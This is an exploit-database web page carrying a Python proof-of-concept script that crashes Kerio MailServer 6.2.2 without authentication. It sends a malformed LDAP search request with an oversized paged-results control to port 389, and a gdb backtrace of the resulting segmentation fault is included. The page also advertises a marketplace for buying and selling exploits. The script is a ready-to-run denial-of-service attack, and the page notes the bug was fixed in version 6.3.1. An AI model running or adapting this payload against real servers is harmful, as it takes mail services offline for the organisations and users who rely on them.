0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kerio MailServer 6.2.2 preauth Remote Denial of Service PoC
[=========================================================== Kerio MailServer 6.2.2 preauth Remote Denial of Service PoC =========================================================== #!/usr/bin/env python # kms1.py - Kerio MailServer 6.2.2 preauth remote DoS # fixed in Kerio MailServer 6.3.1 # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. """ gdb backtrace: # gdb -q ./mailserver core.18450 (no debugging symbols found) Using host libthread_db library "/lib/libthread_db.so.1". Reading symbols from shared object read from target memory...(no debugging symbols found)...done. Loaded system supplied DSO at 0xb76000 Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'. Program terminated with signal 11, Segmentation fault. ... Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x0821c444 in LDAPSearchRequest::parsePagedResults () (gdb) bt #0 0x0821c444 in LDAPSearchRequest::parsePagedResults () #1 0x0821c387 in LDAPSearchRequest::setAll () #2 0x08093d8a in Ber::getSearchRequest () #3 0x08205e48 in LDAPServer::search () #4 0x08207de0 in LDAPServer::server () #5 0x08207e2e in ldap_handler () #6 0x0841be13 in KServerTask::handler () #7 0x082033c6 in KThreadPool::workerThread () #8 0x086ee7b6 in kerio::tiny::thread () #9 0x00772b80 in start_thread () from /lib/libpthread.so.0 #10 0x00558dee in clone () from /lib/libc.so.6 (gdb) x/i $eip 0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>: mov (%eax),%edx (gdb) i r eax eax 0x449 1097 """ from socket import * host = "localhost" port = 389 s = "\x30\x82\x04\x4d\x02\x01\x26\x63\x82\x04\x46\x04\x00\x0a\x01\x02" s += "\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62" s += "\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00\xa0\x82\x04" s += "\x20\x30\x82\x04\x1c" s += "\x01"*1024 s += "\x16\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x31" s += "\x33\x35\x35\x36\x2e\x31\x2e\x34\x2e\x34\x37\x33\x01\x01\x00\x04" s += "\x00" sock = socket(AF_INET, SOCK_STREAM) sock.connect((host,port)) sock.sendall(s) sock.recv(10000) sock.close() # 0day.today [2024-11-16] #